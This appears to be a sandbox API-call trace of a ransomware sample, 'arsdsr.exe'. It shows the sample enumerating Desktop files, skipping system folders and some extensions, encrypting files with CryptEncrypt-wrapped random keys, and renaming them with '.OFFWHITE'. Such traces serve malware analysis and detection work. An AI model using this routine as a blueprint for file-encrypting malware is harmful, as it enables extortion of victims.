SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16572, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.456] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.456] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16672, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.456] WriteFile (in: hFile=0xb0, lpBuffer=0x53f4f8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f4f8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.456] GetProcessHeap () returned 0x500000 [0132.456] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16472) returned 0x5577b0 [0132.456] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.456] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x16472, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x16472, lpOverlapped=0x0) returned 1 [0132.463] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.463] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x16472, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x16472, lpOverlapped=0x0) returned 1 [0132.463] GetProcessHeap () returned 0x500000 [0132.463] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.463] CloseHandle (hObject=0xb0) returned 1 [0132.472] GetProcessHeap () returned 0x500000 [0132.472] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.472] GetProcessHeap () returned 0x500000 [0132.472] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.472] GetProcessHeap () returned 0x500000 [0132.472] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.472] GetProcessHeap () returned 0x500000 [0132.472] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.472] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi" [0132.472] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi.OFFWHITE" [0132.473] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v1c0.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v1c0.avi.offwhite")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe901e2f0, ftCreationTime.dwHighDateTime=0x1d5e471, ftLastAccessTime.dwLowDateTime=0x21a0e4a0, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0x21a0e4a0, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x1b24, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="ypJ6NL.ppt", cAlternateFileName="")) returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2=".") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="..") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="...") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="windows") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="$recycle.bin") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="rsa") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="ntuser.dat") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="programdata") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="appdata") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="program files") returned 1 [0132.474] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="program files (x86)") returned 1 [0132.475] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.475] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ypJ6NL.ppt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt" [0132.475] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.475] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.475] PathFindExtensionW (pszPath="ypJ6NL.ppt") returned=".ppt" [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".com") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".cpl") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".url") returned -1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".mp3") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".pif") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".mp4") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".OFFWHITE") returned 1 [0132.475] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0132.475] lstrcmpiW (lpString1="ypJ6NL.ppt", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.475] GetProcessHeap () returned 0x500000 [0132.476] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f508 [0132.476] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ypj6nl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.476] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=6948) returned 1 [0132.476] GetProcessHeap () returned 0x500000 [0132.476] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.476] GetProcessHeap () returned 0x500000 [0132.476] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.476] GetProcessHeap () returned 0x500000 [0132.476] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.476] GetProcessHeap () returned 0x500000 [0132.476] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.476] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.477] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.477] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.477] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.477] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.477] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.477] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.477] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.477] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.477] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.477] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.477] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.477] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1b24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.478] SetLastError (dwErrCode=0x0) [0132.478] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.481] GetLastError () returned 0x0 [0132.481] GetLastError () returned 0x0 [0132.481] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1c24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.481] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.481] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1d24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.481] WriteFile (in: hFile=0xb0, lpBuffer=0x53f508*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f508*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.481] GetProcessHeap () returned 0x500000 [0132.481] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1b24) returned 0x5577b0 [0132.481] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.481] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x1b24, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x1b24, lpOverlapped=0x0) returned 1 [0132.483] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.483] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x1b24, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x1b24, lpOverlapped=0x0) returned 1 [0132.483] GetProcessHeap () returned 0x500000 [0132.483] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.483] CloseHandle (hObject=0xb0) returned 1 [0132.485] GetProcessHeap () returned 0x500000 [0132.485] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.485] GetProcessHeap () returned 0x500000 [0132.485] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.485] GetProcessHeap () returned 0x500000 [0132.485] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.485] GetProcessHeap () returned 0x500000 [0132.485] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.485] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt" [0132.485] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt.OFFWHITE" [0132.485] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ypj6nl.ppt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ypJ6NL.ppt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ypj6nl.ppt.offwhite")) returned 1 [0132.487] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e2e2210, ftCreationTime.dwHighDateTime=0x1d5daec, ftLastAccessTime.dwLowDateTime=0x9f5c2540, ftLastAccessTime.dwHighDateTime=0x1d5e686, ftLastWriteTime.dwLowDateTime=0x9f5c2540, ftLastWriteTime.dwHighDateTime=0x1d5e686, nFileSizeHigh=0x0, nFileSizeLow=0x5925, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="ZCTLzVl.png", cAlternateFileName="")) returned 1 [0132.487] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2=".") returned 1 [0132.487] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="..") returned 1 [0132.487] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="...") returned 1 [0132.487] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="windows") returned 1 [0132.487] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="$recycle.bin") returned 1 [0132.487] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="rsa") returned 1 [0132.488] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="ntuser.dat") returned 1 [0132.488] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="programdata") returned 1 [0132.488] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="appdata") returned 1 [0132.488] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="program files") returned 1 [0132.488] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="program files (x86)") returned 1 [0132.488] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.488] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ZCTLzVl.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png" [0132.488] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.488] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.488] PathFindExtensionW (pszPath="ZCTLzVl.png") returned=".png" [0132.488] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0132.488] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0132.489] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0132.489] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0132.489] lstrcmpiW (lpString1="ZCTLzVl.png", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.489] GetProcessHeap () returned 0x500000 [0132.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f518 [0132.489] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zctlzvl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.489] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=22821) returned 1 [0132.489] GetProcessHeap () returned 0x500000 [0132.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.489] GetProcessHeap () returned 0x500000 [0132.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.489] GetProcessHeap () returned 0x500000 [0132.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.489] GetProcessHeap () returned 0x500000 [0132.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.490] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.490] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.490] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.490] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.491] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x5925, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.491] SetLastError (dwErrCode=0x0) [0132.491] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.492] GetLastError () returned 0x0 [0132.493] GetLastError () returned 0x0 [0132.493] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x5a25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.493] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.493] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x5b25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.493] WriteFile (in: hFile=0xb0, lpBuffer=0x53f518*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f518*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.493] GetProcessHeap () returned 0x500000 [0132.493] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5925) returned 0x5577b0 [0132.493] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.493] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x5925, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x5925, lpOverlapped=0x0) returned 1 [0132.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.495] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x5925, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x5925, lpOverlapped=0x0) returned 1 [0132.495] GetProcessHeap () returned 0x500000 [0132.496] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.496] CloseHandle (hObject=0xb0) returned 1 [0132.497] GetProcessHeap () returned 0x500000 [0132.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.497] GetProcessHeap () returned 0x500000 [0132.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.497] GetProcessHeap () returned 0x500000 [0132.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.497] GetProcessHeap () returned 0x500000 [0132.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.497] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png" [0132.497] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png.OFFWHITE" [0132.497] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zctlzvl.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZCTLzVl.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zctlzvl.png.offwhite")) returned 1 [0132.499] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b14cd20, ftCreationTime.dwHighDateTime=0x1d5e4fd, ftLastAccessTime.dwLowDateTime=0x4a11f230, ftLastAccessTime.dwHighDateTime=0x1d5d90d, ftLastWriteTime.dwLowDateTime=0x4a11f230, ftLastWriteTime.dwHighDateTime=0x1d5d90d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="_6fHsSKGxaaF_3ovS", cAlternateFileName="_6FHSS~1")) returned 1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2=".") returned 1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="..") returned 1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="...") returned 1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="windows") returned -1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="$recycle.bin") returned 1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="rsa") returned -1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="ntuser.dat") returned -1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="programdata") returned -1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="appdata") returned -1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="program files") returned -1 [0132.499] lstrcmpiW (lpString1="_6fHsSKGxaaF_3ovS", lpString2="program files (x86)") returned -1 [0132.499] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.499] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="_6fHsSKGxaaF_3ovS" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS" [0132.499] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") 